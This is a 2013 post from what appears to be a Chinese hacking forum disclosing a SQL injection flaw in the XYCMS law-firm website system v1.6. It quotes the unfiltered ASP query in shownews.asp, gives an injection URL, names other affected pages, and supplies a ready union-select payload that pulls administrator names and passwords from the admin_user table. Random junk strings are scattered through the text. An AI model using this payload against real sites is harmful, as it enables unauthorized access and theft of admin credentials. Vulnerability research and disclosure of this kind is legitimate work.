找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2168|回复: 0
打印 上一主题 下一主题

XYCMS律师事务所建站系统注入漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-4 17:28:12 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似
# v' M" e) ?) B, ^
( q# b/ l: Y3 B! I9 y9 y淫荡分割线# @- P5 {9 w/ u/ T* t. A2 w
--------------------------------------------------------
  d; h/ ^+ f5 V. Z8 T0 D
" f! f- W5 _8 f, V. \6 h审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)3 Z1 c- {( s2 s4 S1 V" X: `
源码地址:http://down.chinaz.com/soft/29233.htm, e% j/ R! B0 u- O+ M# j5 J
3 Y" ?, W; o9 P3 p( T; J" b
漏洞文件:shownews.asp- ?9 J0 o7 C7 @
漏洞代码:7-13行( }6 E# c5 A1 q. _# p- L1 [; l

6 G6 |2 ]6 @3 N6 ?2 J$ u 0 o+ _5 ~' M$ r1 t2 D2 V; M4 m
<%
1 r- a0 g# Y0 q! b/ j9 a. a' z  oid=request.QueryString("id")
, Z# D& i3 ?2 M4 R2 f2 O    0 Q9 N/ z/ Y/ N# M. s9 C
set snews=server.createobject("adodb.recordset") ! P% o8 B5 i# ^+ Y
exec="select * from [news] where id="&id1 {0 r+ K1 i. L( h
snews.open exec,conn,1,1
7 z8 Y; Q  y+ u3 ~%>4 g! s7 U' @) a

+ s# Y$ n& d6 R5 G1 Z$ c, U8 M 2 V: i& j9 U3 i9 a6 e; L
什么过滤都没有  直造成注入
3 x  |. M' a- M# F- y3 a( |1 S$ Y2 n ' X6 c# m1 `% Q
注入点:http://127.0.0.1:99/shownews.asp?id=xx' `) K0 x9 c- ]1 M' O0 P9 t
8 ]3 U2 |+ V" `) k/ ?
其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找
2 j4 \# {3 Q" R, b . N4 O: T, p  d2 }, r4 G# B
  x& Q6 u) ]. o, ]! `" o+ X" q
exp: union select 1,admin,password,4,5,7 from admin_user9 Q! S) W+ H- [! H8 ~' C
# T* e3 q* X; a2 r6 V( ?  w! f9 ~
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表